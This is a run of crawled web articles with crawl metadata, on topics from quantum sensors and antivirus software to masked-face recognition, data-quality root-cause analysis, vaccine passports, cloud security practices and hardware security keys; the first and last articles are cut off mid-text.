Commonwealth’s Collaborative Research and Development Matching Grant program managed by the Innovation Institute at the Massachusetts Technology Collaborative (MassTech), will advance quantum information sciences, a priority focus area for the R&D Fund. The targeted investment has strong potential for near-term economic impacts, including the creation of new jobs and revenue growth at industry partners, several of which attended Wednesday’s announcement. The grant will support the development of new ultrasensitive, room-temperature quantum sensors, facilities which will provide a vital and unique capability in the state. By focusing on sensors, which are less technically demanding than developing entire quantum computers, Northeastern is undertaking research that provides viable pathways to commercialization within the next two to five years. The project will include a strong focus on workforce training, responding to the growing need for workers that are literate in quantum information sciences. See complete news release here. New stable quantum batteries can reliably store energy in electromagnetic fields Quantum technologies need energy to operate. This simple consideration has led researchers, in the last ten years, to develop the idea of quantum batteries, which are quantum mechanical systems used as energy storage devices. In the very recent past, researchers at the Center for Theoretical Physics of Complex Systems (PCS) within the Institute for Basic Science (IBS), South Korea have been able to put tight constraints on the possible charging performance of a quantum battery. Specifically, they showed that a collection of quantum batteries can lead to an enormous improvement in charging speed compared to a classical charging protocol. This is thanks to quantum effects, which allow the cells in quantum batteries to be charged simultaneously. Despite these theoretical achievements, the experimental realizations of quantum batteries are still scarce. The only recent notable counter-example used a collection of two-level systems (very similar to the qubits just introduced) for energy storage purposes, with the energy being provided by an electromagnetic field (a laser). Given the current situation, it is clearly of uttermost importance to find new and more accessible quantum platforms which can be used as quantum batteries. With this motivation in mind, researchers from the same IBS PCS team, working in collaboration with Giuliano Benenti (University of Insubria, Italy), recently decided to revisit a quantum mechanical system that has been studied heavily in the past: the micromaser. Micromaser is a system where a beam of atoms is used to pump photons into a cavity. Put in simple terms, a micromaser can be thought of as a configuration specular to the experimental model of quantum battery mentioned above: the energy is stored into the electromagnetic field, which is charged by a stream of qubits sequentially interacting with it. The IBS PCS researchers and their collaborator showed that micromasers have features that allow them to serve as excellent models of quantum batteries. One of the main concerns when trying to use an electromagnetic field to store energy is that in principle, the electromagnetic field could absorb an enormous amount of energy, potentially much more than what is necessary. Sandra K. Helsel, Ph.D. has been researching and reporting on frontier technologies since 1990. She has her Ph.D. from the University of Arizona.
<urn:uuid:e39abd9b-b052-493e-856f-43b637f2e879>
CC-MAIN-2022-40
https://www.insidequantumtechnology.com/news-archive/quantum-news-briefs-september-9-crushed-plastic-bottles-could-create-nanodiamonds-for-quantum-sensors-new-device-independent-quantum-cryptography-method-could-provide-more-secure-cncryption-commonw/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00133.warc.gz
en
0.925626
1,697
2.875
3
Whether you’re new to technology or use a handful of devices on a daily basis, you may often wonder, “Why is cybersecurity important?” Every year, millions of pieces of malware threaten devices and networks all around the world. Users are often surprised by how much damage these attacks can cause. However, in many cases, such devastation is entirely preventable. Antivirus software – if maintained properly – can provide powerful protection against a variety of threats. As such, it should form the basis of any modern security protocol. How Does Antivirus Software Work? Antivirus software is designed to scan files consistently to determine whether any new cybersecurity threats have emerged. These may be found within emails, downloads, and general web surfing. As soon as antivirus systems detect potential threats, they can either warn users, block problematic websites, or, in some cases, eliminate the problem altogether. While many people think of antivirus as a single solution, it actually consists of a comprehensive suite of features designed to pinpoint and handle a wide array of threats. Top methods include: - Signature Analysis – One of the most important types of antivirus software protection, signature analysis is the backbone of many modern programs. Under this approach, vendors determine the traits associated with various viruses to streamline detection. - Heuristic Analysis – Today’s sophisticated hackers often disguise malicious codes in hopes of deceiving antivirus programs. Heuristic analysis considers this unfortunate reality while making it possible to stay one step ahead. Under this method, previously unknown viruses can be detected through scans that take suspicious properties into account. - Sandbox Detection – Sometimes referred to as sandbox evasion, this system involves an isolated environment in which running programs are separated in the interest of avoiding Advanced Persistent Threats (APTs). - Behavior Monitoring – Under this approach, antivirus systems monitor all traffic that occurs between computers and devices, such as external hard drives or printers. This solution can often undo changes made by external devices. How to Choose the Right Antivirus Solution While any antivirus solution is better than none at all, the level of protection varies dramatically from one program to the next. This can make it difficult to choose a software, especially when budget comes into play. The first consideration? Free versus paid antivirus. No-cost programs can be helpful in some circumstances but often lack the convenient features offered with paid systems. Many providers have both free and paid versions of the same program. Some users find it helpful, to begin with the free option and upgrade as needed. Other factors worth considering when selecting an antivirus system include: - Compatibility with Your Current Devices – Most antivirus programs work with Apple and Microsoft, but Linux users sometimes struggle to find compatible offerings. - Threat Prevention Features – Some antivirus suites go beyond scanning to include techniques for proactively avoiding future attacks. For example, web browsing protection filters URLs to determine whether some might place users at an increased risk. - Device Speed – In some cases, antivirus programs are effective for detecting and mitigating threats – but at the steep cost of computer speed. Although eager to boost security, many users are not willing to compromise on how efficiently their devices run. Ideally, everyday tasks such as loading applications, downloading files, or streaming videos will not be impacted by antivirus solutions. - Detection Rates – Not all antivirus programs are equally effective at detecting threats. Some fail to spot or handle issues promptly, while others go overboard and alert users to ordinary traffic. Overly aggressive thresholds can quickly grow annoying. Frequent false positives could even result in the removal of important files. The Importance of Updating Antivirus Programs Unfortunately, antivirus protection is not a one-time prospect. New threats emerge every day. As such, even the best programs can quickly become outdated if not updated regularly. However, many people neglect to update antivirus software as often as necessary. This may explain why, despite 95 percent of people claiming to use antivirus programs, many continue to see their devices infected. While antivirus solutions consistently scan for new infections, there are only so many types of viruses or malware they’re equipped to handle. Attackers are constantly developing new systems that can get around even the strongest security features. As such, it doesn’t take long for antivirus programs to fall behind. Updates are also essential in that they provide patches for flaws. Hackers often take advantage of these vulnerabilities, so it’s imperative that they’re addressed as quickly as fixes become available. Thankfully, many antivirus solutions offer automatic updates that can be made on the spot without user interference. This is particularly important for those who tend to procrastinate even when regularly alerted to the need for security updates. Level Up Your Antivirus Protection with NerdsToGo Charlotte Have you fallen behind on installing or updating antivirus protection? If you’re not confident about handling it on your own, don’t worry. You can count on the team from NerdsToGo for help. In addition to antivirus solutions, we offer a variety of other business services designed to keep both your business network and personal devices secure. Contact us today to learn more about our antivirus and other computer security offerings!
<urn:uuid:457426ce-61e0-41a1-8d9f-57f48c0b3ae5>
CC-MAIN-2022-40
https://www.nerdstogo.com/blog/2020/october/the-importance-of-antivirus-software-how-to-keep/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00133.warc.gz
en
0.933647
1,080
3.28125
3
It’s a movie trope as old as cinema. A heated chase scene ends as the bad guy seamlessly blends into a crowd, pulling up his collar, safe in a swarm of people. But thanks to researchers at the Spanish National Research Council (CSIC), this scene may have a different ending; the pursuer pulls out a tablet and uses newly-developed software called idTracker to pinpoint the assailant’s exact location in the crowd. From a cinematic perspective it’s a slightly less exciting conclusion, but technologically it’s groundbreaking- there may no longer be safety in numbers. Typically, computers have not been able to identify individuals (of any species) when they group together for more than a few seconds. But the CSIC team have developed new algorithms that may be able to change this. The abstract for the paper on idTracker in Nature Methods defines the project as “a multitracking algorithm that extracts a characteristic fingerprint from each animal in a video recording of a group. It then uses these fingerprints to identify every individual throughout the video. Tracking by identification prevents propagation of errors, and the correct identities can be maintained indefinitely”. The current application of the software is mapping the behaviour of different animal species in groups. ‘Group mentality’ across the species is a widely-accepted concept, but the intricacies of group dynamics in different animals has been difficult to track and characterise up until this point. The CSIC research group have already used the software to track the behaviours of groups of fish, flies, ants and mice. Alfonso Pérez Escudero, a CSIC researcher during the preparation of this study, stated “in the short term, this will be used in science, but in the longer term, the method we have developed can be applied to recognize people in large crowds, vehicles or parts in a factory, for instance”. Bad guys can rest safe among throngs of people, but only for now.
<urn:uuid:dfe78d4a-7758-4b22-9493-82669d881e08>
CC-MAIN-2022-40
https://dataconomy.com/2014/06/idtracker-bringing-end-safety-numbers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00133.warc.gz
en
0.935377
404
2.6875
3
Facial Recognition Can See Through Masks. Examples and Use Cases The world’s already living the third wave of the COVID-19. The virus has surged across the globe, and we’re not sure when it’ll vanish away. One thing we’re sure of is that the digital will soften its blow. That’s why the debate over facial recognition is taking a new turn. Recently labelled a ‘funny face filters’ and ‘identity verification’ technology, facial recognition is taking traction in other industries. The growing demand for technology has arisen from the impact of the pandemics and the need to get ahead of it. To anticipate, it can be our Swiss army knife in the war against the COVID-19, and here’s why. The technology unveils contactless solutions that are safe to use during the virus outbreak. Touchless body temperature detection, employee entry and attendance, face mask detection, return-to-work solutions for social distance tracking–all of that wouldn’t have been possible without facial recognition. Facial Recognition for Mask Detection It’s safe to say that the technology is adapting to mask-wearing public. The more people wear masks in everyday life, the more AI developers adapt to creating masked face datasets. Researchers from NIST claim that masked images raised even the top algorithms’ failure rate to about 5%, while many competent algorithms failed between 20% to 50% of the time. It paints the picture of how the technology is trying to adapt to these new circumstances. The main challenge of face recognition in 2021 is to learn how to detect and recognize masked faces on dataset images. Datasets are needed to train face identification and recognition algorithms. Images from datasets often have different mask types, orientations and occlusions, which makes its detection a complex task. Detection with occlusions is hard due to the lack of masked datasets (difficulty in exploring the key facial attributes) and the lack of facial landmarks in the masked regions (masks bring the noise to the image). Though this problem has been brought to the spotlight, it’s still important to create large masked datasets and improve the existing solutions. Recent Use Cases Since we’re done explaining the challenges of masked face detection, let’s see how companies and organizations are adapting to the masks-are-the-new-black trend. Real-Time Mask Monitoring Hewlett Packard Enterprise has rolled out a few return-to-work solutions that will help companies bring their employees back to work safely. Distance tracking solution is equipped with video analytics to monitor mask usage in areas required. The solution is a simple and effective way to make sure that office workers follow the safety standards at work. In the coronavirus wake, NEC Corp., known for its ‘solutions for society’, has developed a biometric device that can recognize people wearing masks. The device scans the face of a person and their irises. The company claims that the device promises contactless masked face detection with a low error rate. The NEC’s vice president mentioned that there’s nothing extraordinary about testing their facial recognition algorithms on face masks. Masks are pretty common in Japan, especially during flu seasons. And that’s not only Japan that is trying to overtake the masked face detection and recognition race in Asia. China is getting bullish about face recognition and mass AI adoption. SenseTime, a promising Chinese startup, released software that enables employee building entry and access with the half-covered face. The software recognizes facial features like eyes, eyebrows and nose bridge, making identification through face mask possible. As for efficiency, there’s a room for development for Chinese developers, because sometimes it takes pains to do a touch-free transaction. France has been using AI to monitor whether people are wearing masks on public transport. The software was deployed around the country with a mission to identify those who don’t wear masks. Wearing masks in public places is mandatory in France. If the situation gets worse, they think of considering penalizing the ones who don’t comply with the rules. Sunwin Bus Corporation from Shanghai has rolled out a ‘Healthcare Bus’. They integrated biometric solutions with body temperature detection. It identifies the passengers without masks and uses UV light to disinfect the environment. As they claim they ‘provide safety in a non-invasive way’. By the end of 2020, the number of masked face detection solutions had increased. Digital Barriers launched a monitoring solution with a face detection feature. The main goal was to help retailers provide a safe environment for their workers, The software detects missing face masks and analyzes the crowdedness of a store. Those without a mask on, are not allowed in a store. As for the crowdedness, the software helps maintain social distancing. Body Temperature Scanning Telpo, one of the world’s leading smart terminal manufacturers, has developed a face recognition temperature measuring device. The solution uses AI and facial recognition for masked face detection and contactless temperature scanning. The device determines, whether the person is wearing a mask or not. If not, it reminds them to put on a mask. The face recognition software can’t detect people with or without glasses yet. Detecting Sneezes and Coughs The solution developed by Sensory is yet another evidence of successful mask detection through facial recognition. They’re responding to the coronavirus by adapting their TrulySecure platform to help developers create anti-COVID-19 solutions. They not only can do facial recognition under concealing masks but detect sneezes and coughs. Combining both face and voice into their SDK, the team killed two birds with one stone. They unveiled a solution that helps essential workers maintain safety measures. And gives developers a chance to further develop the technology. There’s more to that. It’s no news that face recognition couldn’t authenticate users wearing glasses or a mask. Most of the enrollments were blocked if the person was wearing a mask. Recently, the face recognition market has been flooded with SDKs of all sorts. An SDK is nothing but a set of features that enable real-time face detection and recognition. If you’re looking for a robust facial recognition SDK, check out the software delivered by our tech team. Integrating SDK into your system, you’ll do facial recognition under concealing masks with ease. Facial Recognition: Changing Dynamics Due to Pandemic In the wake of COVID-19, the demand for face recognition is enormous. The technology might be in its infancy but it’s getting stronger and more accurate over time. Click To Tweet And its application is diverse. Social distancing and contact-tracking, selfie-based solutions for the quarantined, temperature detection, contactless border management, mask detection for safety measures and more. All of that we owe to facial recognition. The virus outbreak has led to hybrid solutions combining face recognition and biometrics. And that’s only the beginning. The pandemic is said to speed up the technology adoption in the healthcare industry. And it is already doing it. Develop Custom Face Recognition Software With InData Labs Have an idea for a face recognition project? Schedule a call with our team of CV experts. Contact us at firstname.lastname@example.org.
<urn:uuid:1321296d-c75c-4b67-8f13-b43227617030>
CC-MAIN-2022-40
https://indatalabs.com/blog/facial-recognition-mask-detection
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00133.warc.gz
en
0.934988
1,555
2.578125
3
Fixing data quality issues is only part of the solution. In order for these not to reoccur, one needs to identify the root cause and prevent from further creating poor data quality. As we know, for every effect there is a cause, and that’s the basis of the root cause analysis. The chain of relationship between the cause and its effect can vary in length, but as one moves along the chain, the cause an effect becomes finer and finer until you get to the root. There are different techniques to identify the root cause, 2 of which I’ve covered earlier: the 5 whys technique and the fishbone diagram. This week I’ll go over the barrier analysis. A root cause analysis technique to help identify both the pathways through which a hazard (in this case a cause of poor data quality) can affect the quality of the data and a measure through which the quality of the data can be maintained. There are four basic elements in the barrier analysis: - Target = In the context of data quality, it represents the desired level of quality for the chosen data set - Hazard\ Threat = This is the way in which the target can be harmed. In the context of data quality, this represents the agent that can adversely affect the desired state of data quality. - Barrier = A prevention method between the hazard and the target in order for the hazard to not have an undesired effect on the target. This can be active (i.e. it’s protective nature needs the actions of an agent – such as a Data Quality Coordinator) or passive (i.e. no additional action on the part of any agent is required – such as an address cleansing API). Note: in some versions, a Barrier is passive and a Control is a synonym for an Active Barrier. - Pathway = A route or mechanism through which a hazard can undesirably affect a target. The barrier analysis is tied to the Swiss cheese model which is a barrier analysis with multiple barriers – each represented by a slice of Swiss cheese 🧀. Why Swiss cheese? Because each potential risk of failure within a barrier, or control, is like a hole in a Swiss cheese. When to use - To determine the causes for poor data quality along with the data lineage - When you want to create an inventory of the sources of data and data lineage from the perspective of data quality - When you need to identify what countermeasures failed to prevent undesired change - A simple technique to learn, which does not require training - Findings can be easily transformed into corrective action recommendations - Works well with other methods and techniques, such as the Pareto analysis, fishbone diagram and the 5 whys - Poses a risk of promoting linear thinking - Can be subjective and dependent on the views and knowledge of the participants - The findings might not be repeatable if you go through the same exercise with other stakeholders How much is poor data quality costing your organization? Here’s how you can estimate that in 5 simple steps Steps to develop it - Identify the main target: Identify the main data quality issue that you would like to uncover its root cause for. - Gather main stakeholders: Once the data quality issue is identified, identify the main stakeholders affected by the issue or taking part of the processes creating and preventing the issue. - Identify the barriers: Start documenting the barriers you are aware of that prevent the issue from happening, but also what barriers might be in place that facilitate the issue. For simplicity, you can also determine the categories they can fall under. For example: training, tool, data source, process, standard. - Determine solutions: Go through each of these barriers and understand the cause and effect of each, which might identify further barriers, but also solutions. Here are some of the questions which should be addressed for each barrier: - Did the Barrier perform its intended function under normal operating conditions? - Did the Barrier perform its intended function under the upset or faulted conditions? - Did the Barrier mitigate the Hazard severity? - Was the Barrier design adequate? - Was the Barrier developed to meet the desired specifications? - Was the Barrier maintained? - Has the Barrier yielded the desired test results? - Review the barrier analysis results independently - Don’t solely use this technique to determine the root causes, but in conjunction with others - Classic whiteboard/ flipchart - Visio diagram - Word document
<urn:uuid:a1d1c5f7-33fe-4a3d-92e5-daba1d800a48>
CC-MAIN-2022-40
https://www.lightsondata.com/how-to-use-barrier-analysis-for-improved-data-quality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00133.warc.gz
en
0.920781
959
2.71875
3
As access to the COVID-19 vaccine continues to expand rapidly, the end of careful quarantining – and a new beginning for travel and events – feels closer than ever. While this is good news for the businesses and travel destinations that have suffered the greatest losses over the last year, new questions have already begun to pop up regarding the protocols and safety mechanisms that will be necessary to minimize COVID-19 transmission as travel and events start to resume. At the center of this next wave of debate: The vaccine passport. From a public health perspective, vaccine passports would greatly reduce the potential for unvaccinated individuals to spread the virus and jeopardize efforts to reach herd immunity. At the same time, management and verification of private health information (PHI) opens the door to a new set of data privacy concerns. A true vaccine passport initiative would be interoperable on a global scale – spanning hundreds of countries and dozens of industries. The closest example of an identity project of this magnitude is today’s global passport system, which took more than 50 years to develop, and remains reliant on printed documents. Creating a modern, digital vaccine passport solution will have challenges, starting with the need for privacy and protection of personal health information (PHI). And, there will also be usability and accessibility challenges to overcome as well. While past passport and credential efforts may not offer a perfect template to follow, the lessons learned from those projects can still serve as valuable best practices as modern vaccine passport initiatives pick up steam. Let’s take a closer look at two critical lessons: - Balancing fraud protection and ease-of-use. For decades, travelers received signed and stamped “yellow cards” when they traveled to and from certain countries to prove they had been vaccinated against highly communicable diseases, such as yellow fever and cholera. This paper process relied on stamps and signatures from physicians and patients to verify identity and validate vaccination. While this paper-driven process makes it easy to create valid vaccine records at the point of vaccination, it could be prone to fraud if used as the foundation for a COVID-19 vaccine passport effort. In order to verify user identity and maximize public trust, proven digital identity and digital signature technologies will need to be used as the foundation for a modern vaccine passport solution. In addition to securing the validation process, the ability to quickly scan a digital QR code from a mobile phone would also help speed verification at ports of entry and departure, compared to complicated paper trails. - Achieving widespread accessibility and interoperability. Today, more than a billion people worldwide are unable to prove their identity using traditional physical IDs, such as passports, birth certificates and driver licenses. Moving to a mobile-based vaccine passport strategy has the potential to create even greater accessibility gaps. Any viable vaccine passport solution will need to incorporate both mobile-based and smart card-based solutions to ensure every user who wants access to a vaccine passport can get one. From a validation standpoint, each vaccine passport solution that enters the market will also need to be universally recognized and scannable across countries and industries to ensure citizens can come and go as they please. Without this capability, a vaccine passport isn’t really a passport at all. In an effort to speed the rollout process, leveraging the validation technology and infrastructure already available in existing systems – such as the global passport system – may offer one way to increase the likelihood of interoperability. The good news is the technology and infrastructure already exist to make a secure, accessible vaccine passport a reality. It’s now up to each of the incoming vaccine passport solutions to learn from past credentialing challenges and apply the right digital identity solutions to solve them. This blog is the first in a three-part series titled “Trusted Vaccine Passports: Restoring a World in Motion.” In the next blog, we will explore the vaccine passport solutions currently in development and what a seamless, end-to-end vaccine credentialing process could look like.
<urn:uuid:5bf94501-9b81-434a-ac97-3278701db8b2>
CC-MAIN-2022-40
https://www.entrust.com/it/blog/2021/04/vaccine-passports-are-coming-what-can-we-learn-from-past-passport-rollouts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00133.warc.gz
en
0.935844
818
2.828125
3
CORRECTED: Intel Monday showed off its latest science project, a teraflop processor with 80 cores that, while it will never be productized, will help the company in its future CPU projects. The CPU was intended to be a research project into how to develop an effective and efficient multicore processor, since Intel sees cores, not clock speed, as the means for performance advancement in the future. “To increase performance, we need to scale out to parallelism. But then you have new issues to deal with, such as all the threads, an operating system that can parallelize the threads, caches that can handle simultaneous processes,” said Sean Koehl, technical strategist of the Terascale program at Intel (Quote). The experiment proved insightful for Intel. “We have learned we’re able to create a high speed mesh that can handle terabits of data per second,” Koehl told internetnews.com. “Something you need to scale these processors is high bandwidth for core-to-core communication.” The chip is not based on x86 or any existing design. The 80 cores are all floating point engines, each with its own high-speed controller for communicating with the other cores. The chip uses Intel’s new 45nm design and the new metals design recently announced that will allow for even smaller processor design in the future. This means energy efficiencies, such as the cores turning each other on and off to save power. “We think this is how we will scale performance in the future. The old manner of turning up clock speed is not proving energy efficient,” said Koehl. One of the ongoing efforts is learning how applications operate in parallel. The terascale chip literally breaks an application or task into 80 pieces and each core does its own small part in the computation process before the entire process is reassembled. However, learning how to effectively design applications to run in parallel is a long process. Because they all behave differently, some applications can achieve the teraflop of throughput this chip is said to offer, while others run considerably slower.
<urn:uuid:25a8f3c9-4594-4e08-9e33-5a87cf47fdc6>
CC-MAIN-2022-40
https://cioupdate.com/intel-unveils-teraflop-processor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.941715
442
3.21875
3
IT is just beginning to understand the impact NVRAM will have on infrastructure. Jim Handy breaks down another new potential entrent into the market, with research from Lancaster University. What they call “UltraRAM” uses triple-barrier Resonant Tunneling to nonvolatile memory that can be read or written with low-voltages. The key to low-voltages means that the memory would not suffer wear to the tunnel dielectric and subsequently not leak off the floating gate, which is what causes flash to eventually become unreadable. The full piece goes into a lot more detail of the material science behind the approach, but if they can ever bring UltraRAM to market, it seems to answer a lot of the existing issues with current DRAM and NAND approaches. Read more at: University of Lancaster Invents Yet Another Memory
<urn:uuid:9951abdd-dbc9-486e-be0b-a3f9a03cb3dc>
CC-MAIN-2022-40
https://gestaltit.com/favorites/rich/are-we-ready-for-ultraram/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.944797
173
2.890625
3
Cloud security is a set of controls, policies, procedures, and technologies that protect data, infrastructure, and systems that are stored in cloud environments. Cloud security measures give businesses the processes and tools they need to keep their data safe, meet their regulatory compliance requirements, protect their customers’ privacy, and establish authentication rules around all of their users and devices. Security for cloud services offers the same functionalities as traditional IT security while enabling businesses to enjoy the numerous benefits of cloud computing. Whether your business is working in a legacy, hybrid, or multi-cloud environment, keeping your data secure is crucial to the success of your company. Here, we’ll cover why cloud security is essential, and the best practices associated with successful cloud security programs. Why cloud security is important Operating on the cloud requires having security measures in place that protect applications, data, and systems from corruption, deletion, leakage, and theft. Because cloud applications require no installation and can be accessed from anywhere with an internet connection, any information that they host is theoretically more susceptible to cyber threats and hacking. Without protecting your cloud storage, your data and user information is at risk. To mitigate this risk, organizations need to implement the appropriate provisions on all cloud computing security threats, regardless of whether they run a native cloud, hybrid, or on-premises environment. By augmenting your cloud security posture, you can: - Prevent existing cloud threats. Data stored in the cloud is readily accessible to cybercriminals if it isn’t secured with the appropriate protections. Unprotected data leaves organizations vulnerable to data loss, as well as risks like compromised APIs, account hijacking, malicious insider threats, mobile security threats, and weak access, credential, and identity management. - Defend against evolving risks. The threat landscape is constantly changing as cybercriminals deploy increasingly sophisticated attack methods. It’s vital that companies keep their security defenses up to date. - Centralize security. Cloud-based networks are accessed by thousands—and even millions—of users and devices from a range of locations at all hours. Managing this ebb and flow manually can be near impossible and increases the risk of leaving business data vulnerable to an attack. Streamlining access management and centralizing the protection of data enhances security and reduces administrators’ workloads. - Reduce costs. Cloud infrastructure security removes the need for businesses to invest in dedicated, often expensive hardware. Cloud security offers 24/7 protection with minimal human intervention required, reducing capital expenditure and administrative overhead. Use a best-in-class security platform to ensure your users and their data are protected, while freeing your administrators, IT, and security teams to spend less time on unnecessary administrative tasks and more on tasks that add value to your business. Factors to consider when implementing cloud security There are several questions that businesses should consider before investing in a cloud networking security solution. - Has the solution provider been thoroughly vetted? A company is only as strong as the security solutions it adopts. Ensure that the security tools you choose for your cloud services are from trusted and proven providers. - Can you automate your software updates? It’s no good having security in place to protect data if it doesn’t stay up to date with the latest threats. Ensure that software is set to install updates as and when they arrive. Automation also removes the risk of employees forgetting to update their software or devices. - Does the solution meet your compliance requirements? Like the threat landscape, compliance regulations are also constantly changing. Businesses need to be aware of the compliance requirements of the various jurisdictions in which they store cloud-based personal, financial, and sensitive data—and have a solution that covers all those bases. Cloud security best practices There are several cloud security best practices that businesses can implement to ensure their solutions and teams are protected. 1. Deploy multi-factor authentication Adaptive MFA is crucial to helping businesses add an extra layer of security to their cloud-based environments while improving user experiences. Passwords are no longer enough when it comes to protecting user accounts and sensitive business data. Along with stolen credentials, weak passwords are one of the easiest and most popular ways for hackers to gain unauthorized access to business systems: it’s estimated that 80% of security breaches involve compromised passwords. MFA requires employees, customers, and partners to verify their identity by providing a second piece of evidence—whether a one-time password or biometric verification—when attempting to access applications, devices, and systems. This process ensures businesses aren’t relying solely on username and password combinations to authenticate users. 2. Go passwordless Once you’ve established MFA, the next step for many companies will be detach from passwords altogether. Passwordless authentication enables businesses to: - Leverage session risk to enhance the authentication experience. - Provide one-click or one-touch authentication across desktop and mobile. - Reduce IT helpdesk and support costs associated with password management. - Minimize the risk—and cost—of data breaches caused by stolen or compromised credentials. 3. Manage user access Employees really only require access to the applications and resources they need to get their job done. And providing users with access levels beyond what they need can leave a business open to credential theft and insider threat attacks. Organizations need to set appropriate levels of authorization to ensure that every employee is only able to view and access the applications and data they require. They can also set user access rights to prevent an employee from editing or deleting information they aren’t authorized to and protect them from hackers stealing an employee’s credentials. 4. Constantly monitor activity Given the high threat level of cloud applications and systems, it’s important to regularly and systematically scan for any irregular user activity. Businesses should carry out real-time analysis and monitoring to detect any actions that deviate from regular usage patterns, such as a user logging in from a new IP address or accessing an application from a new device. These irregularities can indicate a potential security breach, so real-time monitoring helps to stop a hacker before they can do any damage. And in the case where a user has accessed the system from a new device and triggered a benign alert, they can be quickly and easily verified through MFA. Solutions that help businesses to monitor applications and systems in real time include endpoint detection and response, intrusion detection and response, and vulnerability scanning and remediation. 5. Automate onboarding and offboarding When a new employee joins a company, they require access to the applications and systems they need to get up and running and do their job effectively. However, it’s equally important that as soon as an employee leaves the organization their access to all data and resources is revoked. Automating the onboarding and offboarding process ensures that no mistakes are made, there’s no delay in deprovisioning user access, and takes the burden of account maintenance off of admins and IT teams. 6. Ongoing employee training Having cloud computing security in place is important, but it’s also vital to ensure that your employees understand the risks that they face. With password and credential theft so prevalent, employees are an organization’s first line of defense against hackers. Organizations need to provide regular training to keep security top of mind for employees. Teams should be trained to understand the signs of a phishing attack, what spoofing websites are, and the tactics hackers use to target victims. What makes cloud security different from on-premises security? Unlike traditional, static data storage, the cloud is always changing. That means businesses need a security approach that is adaptable, automated, and evolving. Businesses should also be aware of the key differences between application security in the cloud and traditional IT security: - The perimeter has shifted. In the past, businesses secured a network perimeter and then presumed everything behind it was trusted and everything outside it was not. But cloud environments are highly connected, enabling users to connect to business networks from multiple devices and various locations—in other words, people have become the new perimeter. With a growing number of users and devices, this distributed perimeter increases the risk of unauthorized access via account hijacks, insider threats, insecure APIs, and weak identity management processes. A new security mentality is required to strengthen authorization and authentication, protect identities, and encrypt data. - Everything is software, and software requires security. A cloud computing infrastructure offers several hosted resources that are delivered to users through applications. These resources are dynamic, portable, and scalable, and are organized by cloud-based management systems and APIs. Cloud security controls accompany workloads and data at all times—whether it is at rest or in transit—to protect environments from corruption and data loss. - The threats are more sophisticated. Modern computing, including the cloud, is susceptible to the growing range of increasingly sophisticated cyber threats. From malware to AI-enabled social engineering and advanced persistent threats (APTs), these threats are purposefully created to target vulnerabilities in businesses’ systems and networks. Cloud security is constantly evolving in response, and it’s imperative for organizations to keep pace and follow the latest best practices to prevent emerging threats.
<urn:uuid:81bcfc36-8bf8-4d5d-ae7e-04ca64d10d18>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/cloud-security-basics-best-practices-implementation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.934247
1,899
2.65625
3
Protecting your online accounts has become more important, as so much of our lives takes place on websites, via email, and through messaging. If someone gets access to some of your accounts – especially your email account – they can get access to others, and potentially usurp your identity. In order to ensure security, most sensitive services now offer two-factor authentication (sometimes called two-step authentication). This combines something you know – your user name and password – with something you have, which is generally a code that is generated on demand. In many cases, these codes are sent by SMS text messages, and must be used within a few minutes. But SMS is inherently insecure, and other methods are needed to ensure optimal security. Security keys are another way to add an additional authentication factor. They are portable, like flash drives, and easy to use. In this article, I’m going to explain why you might want to use a security key to protect certain accounts, how to set one up, and how to use it. Why SMS is insecure SMS is practical and fast, but it has security risks. SMSs are not encrypted, and can be intercepted in transit. Someone could steal your phone, and, even if they can’t unlock it, if you have your device set to show the content of your messages on the lock screen, they can see your codes as they arrive. Or someone could clone your phone, getting a SIM card with the same number as you, intercepting your messages in real time. Authenticator apps are another option. They create unique, time-limited, one-time passwords. Each code is valid for thirty seconds, because both the server you’re logging into and the authenticator app know what time it is. Your authenticator app, or password manager handling these codes, shows a countdown as the time progresses, and generates a new code when the time runs out. A security key is essentially a mini flash drive that contains a tiny bit of data, which is a cryptographic key. When you plug it into your computer, that data is read, and it works like a key in a lock, providing a second factor that unlocks a digital door. Unless someone has your security key, they can’t get into your account. They use the FIDO2 protocol, which has been widely adopted by major tech companies, but is far from universal. Why use a security key? You don’t use a security as much for your own logins but rather to prevent others from accessing your accounts. It may seem to be a hassle to have to stick a key into a USB port every time you log into a website with a new device, but you generally only have to do it once on each device. From that point on, you can choose to trust your device and you won’t need to use the key again for some time (many services require a new, full login, whether with a one-time code or security key, at regular intervals). And if you lose the security key, you can revoke it on the website, so no one else can use it to access your account. Because of the various types of ports and connectors used on computing devices, security keys come in many versions. This can be a problem if you want to use a key with, say, an iMac, a MacBook Pro, an iPhone, and an iPad. Some keys work with NFC (near-field communication), allowing wireless recognition with iPhones, but not iPads, and others are available with Bluetooth. One brand, Yubico, makes its keys in the following versions: - USB-C and Lightning - USB-A and NFC - USB-C and NFC You can use adapters for the different USB plugs, so a USB-C key will also allow you to use it with a USB-A port or vice-versa. Google’s Titan Security Key is available in a bundle that includes: - USB-A and NFC The Titan Security Key bundle includes a USB-A to USB-C adapter, and a mini-USB to USB-A adapter for the Bluetooth key, which allows it to work via USB, but also to charge the device which contains a battery. I tried both of these security keys, each of which cost about $50, and the Google bundle was by far the most practical: Bluetooth is more widely supported than NFC, and all my portable Apple devices can work with this key. Which services support security keys? A wide range of services support security keys. You can protect your Google and Microsoft accounts, you can use a security key with Dropbox, Twitter, Facebook, Instagram, and YouTube, and a number of password managers support these devices. One absence is Apple services, because Apple uses their own method for two-factor authentication, which is based on the company’s chain of trust across devices. However, you can use 